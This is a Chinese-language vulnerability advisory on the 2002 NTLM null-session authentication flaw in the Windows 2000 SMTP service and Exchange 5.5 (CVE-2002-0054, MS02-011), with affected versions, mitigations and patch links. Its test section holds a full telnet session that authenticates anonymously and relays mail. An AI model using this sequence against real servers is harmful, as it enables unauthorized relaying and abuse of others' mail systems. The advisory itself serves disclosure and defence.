发布日期：2002-02-27
更新日期：2002-03-04

受影响系统：

Microsoft Exchange Server 5.5
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows BackOffice 4.5
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft Exchange Server 5.5SP1
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows BackOffice 4.5
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft Exchange Server 5.5SP2
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows BackOffice 4.5
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft Exchange Server 5.5SP3
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows BackOffice 4.5
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft Exchange Server 5.5SP4
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows BackOffice 4.5
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 SMTP Service
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1

描述：

---

BUGTRAQ  ID: 4205
CVE(CAN) ID: CVE-2002-0054

Windows系统的IIS服务器自带了一个SMTP服务器组件。

Windows 2000 SMTP服务和Exchange Server 5.5 Internet Mail Connector服务对发信认证的实现上存在漏洞，可以使本地局域网攻击者得到主机的用户级非法访问权限。

IIS的SMTP组件支持SMTP AUTH认证命令，它支持NTLM认证选项，目的是允许用户用NTLM认证方式认证自己。然而NTLM支持空会话方式，一个匿名用户可能用这种方式“认证”自己，当这种认证完成以后，用户就被准许转发邮件了。Exchange 2000被证实不受此漏洞影响。

<*链接：http://archives.neohapsis.com/archives/bugtraq/2002-02/0372.html
        http://www.microsoft.com/technet/security/bulletin/MS02-011.asp
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Todd Sabin （tsabin@razor.bindview.com）提供了如下测试方法：

% telnet 192.168.8.129 25
Trying 192.168.8.129...
Connected to 192.168.8.129.
Escape character is '^]'.
220 w2ks.w2kvm.qnz.org Microsoft ESMTP MAIL Service, Version: 5.0.2172.1 ready at  Wed, 29 Aug 2001 11:52:15 -0400
HELO foo
250 w2ks.w2kvm.qnz.org Hello [192.168.8.1]
MAIL From:<>
250 2.1.0 <>....Sender OK
RCPT To:
550 5.7.1 Unable to relay for secure@microsoft.com
AUTH NTLM TlRMTVNTUAABAAAAB4IAgAAAAAAAAAAAAAAAAAAAAAA=
334 TlRMTVNTUAACAAAACgAKADAAAAAFgoGAXAsmsHmPZoAAAAAAAAAAAGQAZAA6AAAAVwAyAEsAVgBNAAIACgBXADIASwBWAE0AAQAIAFcAMgBLAFMABAAaAHcAMgBrAHYAbQAuAHEAbgB6AC4AbwByAGcAAwAkAHcAMgBrAHMALgB3ADIAawB2AG0ALgBxAG4AegAuAG8AcgBnAAAAAAA=
TlRMTVNTUAADAAAAAQABAEAAAAAAAAAAQQAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABBAAAABYIAAAA=
235 2.7.0 Authentication successfull
MAIL From:<>
503 5.5.2 Sender already specified
RCPT To:
250 2.1.5 secure@microsoft.com
DATA
354 Start mail input; end with .
Subject: your SMTP server supports null sessions

yada yada yada

.
250 2.6.0  Queued mail for delivery
QUIT
221 2.0.0 w2ks.w2kvm.qnz.org Service closing transmission channel
Connection closed by foreign host.

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 如果您不需要提供SMTP服务，关闭此服务。

* 对SMTP服务端口进行访问控制，确信只有合法用户能够访问。

厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS02-011）以及相应补丁:
MS02-011：Authentication Flaw Could Allow Unauthorized Users To Authenticate To SMTP Service
链接：http://www.microsoft.com/technet/security/bulletin/MS02-011.asp

补丁下载：

Microsoft Windows 2000 Server, Professional and Advanced Server:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=_36556

Exchange Server 5.5:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=33423

浏览次数：4548
严重程度：0（网友投票）